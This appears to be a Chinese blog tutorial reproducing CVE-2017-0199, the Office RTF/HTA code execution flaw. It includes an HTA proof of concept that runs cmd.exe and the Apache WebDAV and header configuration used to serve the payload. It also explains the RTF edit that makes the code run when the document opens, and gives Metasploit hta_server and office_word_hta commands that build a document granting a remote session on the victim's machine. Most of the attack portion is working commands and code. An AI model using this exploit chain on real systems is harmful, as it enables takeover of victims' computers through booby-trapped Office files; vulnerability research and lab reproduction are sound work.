CVE-2017-0199漏洞复现过程

栏目: 服务器 · Apache · 发布时间: 6年前

内容简介:CVE-2017-0199漏洞复现过程

一台apache服务器(这里我用Kali)、POC和一个Word文档。

POC内容大概如下:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>

Word文档内容任意。

CVE-2017-0199漏洞复现过程

然后将其放在Kali服务器上

Apache需要开启DAV支持,具体命令如下

a2enmod dav  
a2enmod dav_fs  
a2enmod dav_lock  
a2enmod headers

CVE-2017-0199漏洞复现过程

测试过程

在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf

root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf

新建Word文档,插入对象

如图

CVE-2017-0199漏洞复现过程

并保存为rtf文件,如233.rtf

删除服务器上的test.rtf文件

并将poc.hta文件复制到ms目录下,并改名为test.rtf

root@kali:/var/www/html/ms# rm -rf test.rtf
root@kali:~/Documents# cp poc.hta /var/www/html/ms/test.rtf

修改Apache配置

<Directory />  
Dav on  
</Directory>  

 <Directory /var/www/html/ms/>  
Header set Content-Type "application/hta"  
</Directory>

CVE-2017-0199漏洞复现过程

并重启服务器 service apache2 restart

打开233.rtf文档

双击word文档的文字,将会有惊喜弹出

CVE-2017-0199漏洞复现过程

打开文档就弹出的话需要将 \object\objautlink\rsltpict 修改为

\object\objautlink\objupdate\rsltpict
CVE-2017-0199漏洞复现过程

再次打开文件

CVE-2017-0199漏洞复现过程

彩蛋(MSF下的实现)

在kali下执行。

首先更新msf到最新。(假设你们都完成了这个过程)

下载利用脚本

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

然后msf下执行命令 reload_all 重新加载模块

CVE-2017-0199漏洞复现过程

下载rtf文件到 /usr/share/metasploit-framework/data/exploits 目录

cd /usr/share/metasploit-framework/data/exploits

wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf

开启hta服务

msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
msf exploit(hta_server) > run

CVE-2017-0199漏洞复现过程

生成exploit文档

msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
msf exploit(office_word_hta) > run

CVE-2017-0199漏洞复现过程

将生成的msf.doc文件复制到windows上,打开即可获取一个会话

如下所示


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

组合数学教程

组合数学教程

范林特 / 刘振宏、赵振江 / 机械工业出版社 / 2007-4 / 49.00元

本书介绍组合数学中的基础理论和实际应用,讲述的内容非常广泛,讨论的问题涵盖组合数学所涉及的绝大部分领域。本书不仅包含了通常组合数学教科书中的经典内容,而且收集了若干新的内容,如Lovász筛法、范德瓦尔登积和式猜想、结合区组设计、码和设计等。 本书阐述深入浅出,简明易懂,适合作为高等院校高年级本科生与低年级研究生的组合数学课程教材,也适合作为数学和其他学科的研究人员的参考书。一起来看看 《组合数学教程》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

html转js在线工具
html转js在线工具

html转js在线工具